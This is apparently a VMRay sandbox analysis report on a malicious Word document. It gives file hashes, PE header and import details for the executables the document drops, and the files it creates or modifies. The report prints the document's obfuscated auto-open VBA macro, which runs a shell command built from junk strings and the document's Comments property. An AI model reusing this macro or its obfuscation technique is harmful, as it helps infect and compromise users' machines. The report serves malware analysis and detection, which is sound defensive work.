Persistent Malware | Files
Try VMRay Analyzer
File Information
Sample files count 1
Created files count 5
Modified files count 3
c:\users\bgc6u8oy yxgxkr\desktop\sample_file.doc
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\desktop\sample_file.doc (Sample File)
Size 59.00 KB (60416 bytes)
Hash Values MD5: e3f53eb751acc7eb18645753a15a1325
SHA1: b98d80994ef3f6a66ce37fabcb862752673de8d5
SHA256: 455be9278594633944bfdada541725a55e5ef3b7189ae13be8b311848d473b53
Actions
VBA Information
+
VBA Properties
Module Count 1
Macro Count 2
Module1.bas - Activate Workbook
+ 
Sub autoopen()
YPBALtUaxa
End Sub
Module1.bas - Eventless
+ 
Function YPBALtUaxa()
LXxeuxgW = "WsKaCMuKU" + "pSbWwraCzK" + "vNZECzw" + "GRtZHMUNKxb" + "rDNkdeDH" + "DYnDmzfuZaV" + "RxdZuREUTKd" + KPHsVttxfBg = "RxzkKtCmM" + "sVdsXBppZ" + "zFuyFtSWh" + "LtAYsKBMK" + "SsSyLtfYmy" + "rGVxsLF" + "EcekhReVpLT" + vSNPHwVDHVx = "FyAWuwyU" + "RespRFT" + "czgPUeW" + "BUghykR" + "fYCWeHyS" + "MCDwxvgssMW" + "dKuCNTgWbfs" + bepZFRv = "XtCUWTDrmMv" + "MruufYeUR" + "PymSCENgkWh" + "mNrCGdD" + "gPDYdbBF" + "kwUmUXGMRXn" + "wfGLRRHR" + cmbFMfzX = "mvdTxDArt" + "nFSUzznK" + "gkuLNVz" + "HxNCCTWX" + "CHSvbdbdnyc" + "TRDULTsMGwV" + "BCGCBaK" + mFeewxy = "AUSYGPHwv" + "nBKyVvhfCYP" + "AkRpekv" + "AAPRMUNP" + "BUxhmvKchA" + "VMNkMCHS" + "CgfMeYPhFzW" + "wUGCYgCd"
ZFktLfW = "pguKBuA" + "fczercYgB" + "mBEzKDtCnWW" + "ZCZXyAt" + "BUhKfda" + "CnswDUA" + "zUXuKYSfFxX" + ySmvTnEbFS = "FxfzBuZhcs" + "DwTyMsShaDd" + "VeXfLaK" + "TNZvPrwxXvD" + "VyyRRbg" + "RftYgZS" + "BAxWvmcreT" + TFFystv = "MkYHprk" + "ecZfRBdCmmM" + "fFFVeEfC" + "ELWEXuUw" + "rtkCUtp" + "MPxbtAz" + "wTXBvaZusmZ" + "WAGGhmt"
VadCGdgd = "CtRSuxRLK" + "uZkbYfSR" + "dNXkYwKpF" + "sVKWfWytZ" + "fMaBeHVu" + "UTAaUgZtTXA" + "cLeaWVWhsp" + PePbMHYCp = "fyGPBHu" + "MxCTZzP" + "NEReWKHDRh" + "wPNnDsYUV" + "hyrmXrE" + "TwTFWUvnKYk" + "rsuLVGRZ" + tZBPeMgZgmb = "YzNgyKmzvRx" + "CsUZzDXw" + "ZMKYFckG" + "DXWTRRnCLht" + "mUHPVdbM" + "YKVSwncRTRp" + "KtGHVZbPV" + LdSYNHb = "VMsxhNG" + "XfvYKynMy" + "enUEHYA" + "mGVRSfbZykn" + "frAgyuCFKaB" + "kkbETbt" + "hSCDBhRVrda" + "TNARYcY"
ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP"
VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0
hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "SyuBTBGSG" + "EBfdfaWP" + "MtgxaGC" + "PfxYdtzCWtb" + ZryTTckxYPf = "ZhAyuant" + "gkXhpaH" + "XTYbKbhZGVA" + "tFmhVnR" + "gXKRAers" + "kTHZrxKVBk" + "NGcwzdsLV" + "pDuZtEGx"
nevByfzD = "YyzpDedfr" + "BkUFdGLKEP" + "tZZnVny" + "kVxyDpBUbe" + "BHmmtxs" + "bVTRGXh" + "zWtSrLD" + yAPMvhesKK = "YvzBwVhw" + "WvbDeNRgm" + "HGmxRKpeccm" + "GKEXXuEE" + "EFdUevzfcdu" + "dASKDCw" + "UrYngTuwudm" + YWnXHVmbrSr = "UmBWZzdBLe" + "eWAZhNm" + "uhFcwDBzk" + "nHhgBLCkcKV" + "RZvXMymAw" + "FadhENfdv" + "SsCaYfh" + UwWvTmfR = "brYLsbAwd" + "dfbPcNdGrGa" + "DDZzwbGpbZ" + "RgvUeegFf" + "dZawxtuHYZA" + "svzuRKnVxRt" + "DkwNAKdEk" + ypRNFLz = "SDXbGkD" + "wBcBWbukvMm" + "HPMteNZx" + "VgTWNcbskYD" + "kRWGaGrebrB" + "zTZskDx" + "xXSDNkmk" + "ZkyfVYCCChK"
XKMKrVsuNH = "VWpnWtWz" + "NcvvvbfEx" + "evScFkctbE" + "gLYELnNenFZ" + "MspEUzMd" + "htLHGUXFdH" + "nVKCKsHa" + pLwNywrMpvT = "csFtNHbbnD" + "rfxEpKWn" + "zkKuyCXSLb" + "GCmStsTVCWD" + "CkcAgSN" + "NZFPvNaUt" + "GvrfrndDrSF" + ZSXAkVr = "gWkuMCs" + "kxhkZrYW" + "zvaSnrYuny" + "EmkzbBuax" + "UkvuyXMvzM" + "PUyyWDv" + "YwDLwWtwDhk" + sCdDehrXu = "UcDHkNdgGwS" + "YBhPFwUnkN" + "BCMYsFS" + "uDACKdVt" + "rVeXEAtn" + "ymYBaKA" + "tPxCaGYgcHn" + "vFXwLZecKMt"
mwDRyVaab = "WcWGVZxvbv" + "wLTzkvpWTZ" + "PEWXYXXvD" + "dVtGSfaTDW" + "HXnePFyw" + "vCsvdTNyc" + "MVByGEKXEzc" + mfKAYhzVYL = "VzznTVmW" + "LzxWFuCL" + "mgeVcxVF" + "BZkUkGtsBfC" + "bnTaUYFmsdT" + "ZdeYysxR" + "fDSwgeE" + "PCMpMucuwM"
End Function
c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe, ...
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\temp\42753.exe (Created File)
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe (Created File)
Size 100.00 KB (102400 bytes)
Hash Values MD5: d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42
SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x401640
Size Of Code 0x3000
Size Of Initialized Data 0x16000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-10-03 18:31:10
Compiler/Packer Unknown
Sections (4)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2dd0 0x3000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.25
.data 0x404000 0x1174 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 0.69
.crt 0x406000 0x12788 0x13000 0x5000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 7.61
.reloc 0x419000 0x292 0x1000 0x18000 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 1.11
Imports (37)
+
msvcrt.dll (4)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
memset 0x0 0x40609c 0x18420 0x17420
strcspn 0x0 0x4060a0 0x18424 0x17424
strtod 0x0 0x4060a4 0x18428 0x17428
fgetwc 0x0 0x4060a8 0x1842c 0x1742c
ESENT.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
JetBeginExternalBackup 0x0 0x406010 0x18394 0x17394
GDI32.dll (2)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetLogColorSpaceA 0x0 0x406018 0x1839c 0x1739c
GetCurrentObject 0x0 0x40601c 0x183a0 0x173a0
COMDLG32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetSaveFileNameW 0x0 0x406008 0x1838c 0x1738c
msi.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
(by ordinal) 0xa0 0x406094 0x18418 0x17418
ADVAPI32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
OpenSCManagerW 0x0 0x406000 0x18384 0x17384
KERNEL32.dll (27)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
InterlockedExchange 0x0 0x406024 0x183a8 0x173a8
LoadLibraryA 0x0 0x406028 0x183ac 0x173ac
GetProcAddress 0x0 0x40602c 0x183b0 0x173b0
GetLastError 0x0 0x406030 0x183b4 0x173b4
RaiseException 0x0 0x406034 0x183b8 0x173b8
LoadResource 0x0 0x406038 0x183bc 0x173bc
FreeLibrary 0x0 0x40603c 0x183c0 0x173c0
LocalFree 0x0 0x406040 0x183c4 0x173c4
LocalAlloc 0x0 0x406044 0x183c8 0x173c8
CreateFileW 0x0 0x406048 0x183cc 0x173cc
FileTimeToLocalFileTime 0x0 0x40604c 0x183d0 0x173d0
UnhandledExceptionFilter 0x0 0x406050 0x183d4 0x173d4
ReadFile 0x0 0x406054 0x183d8 0x173d8
GetTimeZoneInformation 0x0 0x406058 0x183dc 0x173dc
GetVersionExW 0x0 0x40605c 0x183e0 0x173e0
InterlockedIncrement 0x0 0x406060 0x183e4 0x173e4
DefineDosDeviceW 0x0 0x406064 0x183e8 0x173e8
CloseHandle 0x0 0x406068 0x183ec 0x173ec
SetErrorMode 0x0 0x40606c 0x183f0 0x173f0
InterlockedDecrement 0x0 0x406070 0x183f4 0x173f4
IsDebuggerPresent 0x0 0x406074 0x183f8 0x173f8
AreFileApisANSI 0x0 0x406078 0x183fc 0x173fc
SetFileApisToANSI 0x0 0x40607c 0x18400 0x17400
SetFileApisToOEM 0x0 0x406080 0x18404 0x17404
GetWindowsDirectoryA 0x0 0x406084 0x18408 0x17408
lstrcatA 0x0 0x406088 0x1840c 0x1740c
GetBinaryTypeA 0x0 0x40608c 0x18410 0x17410
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, ...
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe (Created File)
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe (Created File)
Size 92.00 KB (94208 bytes)
Hash Values MD5: 2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc
SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1
Actions
PE Information
+
File Properties
Image Base 0x400000
Entry Point 0x401d90
Size Of Code 0x3c00
Size Of Initialized Data 0x14000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2017-10-12 21:31:20
Compiler/Packer Unknown
Sections (5)
+
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x3acc 0x3c00 0x400 CNT_CODE, MEM_EXECUTE, MEM_READ 6.16
.data 0x405000 0x1f60 0x1000 0x4000 CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE 6.79
.crt 0x407000 0x116ba 0x11800 0x5000 CNT_INITIALIZED_DATA, MEM_READ 7.64
.rsrc 0x419000 0x440 0x600 0x16800 CNT_INITIALIZED_DATA, MEM_READ 2.62
.reloc 0x41a000 0x17c 0x200 0x16e00 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 4.88
Imports (15)
+
SETUPAPI.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
SetupFindFirstLineW 0x0 0x407034 0x1854c 0x1654c
COMCTL32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
GetMUILanguage 0x0 0x407000 0x18518 0x16518
ntdll.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
memset 0x0 0x407044 0x1855c 0x1655c
ole32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
CoGetObjectContext 0x0 0x40704c 0x18564 0x16564
SHELL32.dll (1)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
SHGetFileInfoA 0x0 0x40703c 0x18554 0x16554
KERNEL32.dll (10)
+
API Name Ordinal IAT Address Thunk RVA Thunk Offset
LoadLibraryA 0x0 0x407008 0x18520 0x16520
ConvertFiberToThread 0x0 0x40700c 0x18524 0x16524
GetLastError 0x0 0x407010 0x18528 0x16528
InterlockedExchange 0x0 0x407014 0x1852c 0x1652c
FreeLibrary 0x0 0x407018 0x18530 0x16530
GetProcAddress 0x0 0x40701c 0x18534 0x16534
LocalFree 0x0 0x407020 0x18538 0x16538
LocalAlloc 0x0 0x407024 0x1853c 0x1653c
RaiseException 0x0 0x407028 0x18540 0x16540
GetConsoleCP 0x0 0x40702c 0x18544 0x16544
c:\programdata\c570.tmp, ...
-
File Properties
Names c:\programdata\c570.tmp (Created File)
c:\programdata\c571.tmp (Created File)
c:\programdata\c572.tmp (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\programdata\c572.tmp
-
File Properties
Names c:\programdata\c572.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: f10107805ff54bb9c1e1cb047b604439
SHA1: 787f5296c509df55e9dea0f22ea76afaa8953676
SHA256: f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68
Actions
c:\programdata\c571.tmp
-
File Properties
Names c:\programdata\c571.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: e56a6538abf1d60544ce14111c423323
SHA1: f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b
SHA256: 0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da
Actions
c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\roaming\microsoft\windows\cookies\index.dat (Modified File)
Size 32.00 KB (32768 bytes)
Hash Values MD5: e8289ca60a86329fef2726ababd2b99a
SHA1: a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d
SHA256: 33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de
Actions
c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat
-
File Properties
Names c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\history\history.ie5\index.dat (Modified File)
Size 64.00 KB (65536 bytes)
Hash Values MD5: 4d32b3456316311c50d77f7a37556236
SHA1: 47f9117eb7cf12bd3c36295b8084e98d962b6861
SHA256: 4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6
Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image